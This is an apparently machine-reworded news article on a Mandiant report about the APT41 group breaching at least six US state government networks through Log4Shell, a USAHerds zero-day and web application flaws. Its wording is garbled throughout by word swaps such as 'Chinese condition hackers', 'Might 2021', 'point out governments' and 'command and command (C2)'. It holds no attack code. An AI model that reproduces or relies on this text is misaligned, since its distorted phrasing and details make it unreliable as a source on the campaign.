Security researchers have exposed a main new campaign by Chinese condition hackers in which they exploited Log4Shell and other bugs to compromise at least six US state authorities networks.
Mandiant claimed the exercise involving Might 2021 and February 2022 indicated a deliberate marketing campaign. Nevertheless, it could not say definitively no matter if the prolific group known as APT41 was conducting functions for the point out or moonlighting for its have achieve.
What it did expose are “significant new abilities,” together with new attack vectors and post-compromise tools and strategies.
The team specific vulnerable internet-facing web apps for first accessibility, generally by way of .NET deserialization attacks and SQL injection and listing traversal vulnerabilities.
APT41 blended zero-working day assaults, in this scenario, to compromise off-the-shelf application USAHerds, with exploits of identified bugs such as Log4Shell.
In the case of the latter, they were claimed to be exploiting Log4j “within hours” of the Apache Foundation’s advisory to compromise at the very least two US point out governments as very well as a lot more traditional targets in the insurance policy and telecoms industries.
In late February 2022, APT41 was even uncovered to have re-compromised two previous US point out government victims.
“APT41 can immediately adapt their preliminary obtain approaches by re-compromising an ecosystem as a result of a distinctive vector, or by quickly operationalizing a clean vulnerability,” Mandiant concluded. “The team also demonstrates a willingness to retool and deploy abilities via new attack vectors as opposed to holding onto them for potential use.”
The group was also observed customizing malware to specific victim organizations’ environments and hid its command and command (C2) tackle in encoded info on tech group message boards, which it frequently updated.
“While the ongoing disaster in Ukraine has rightfully captured the world’s consideration and the prospective for Russian cyber-threats are actual, we ought to bear in mind that other big threat actors all-around the environment are continuing their functions as typical,” argued Mandiant principal menace analyst Geoff Ackerman.
“We can’t allow other cyber exercise to tumble to the wayside, particularly provided our observations that this campaign from APT41, 1 of the most prolific risk actors all-around, continues to this day.
Some parts of this article are sourced from:
www.infosecurity-journal.com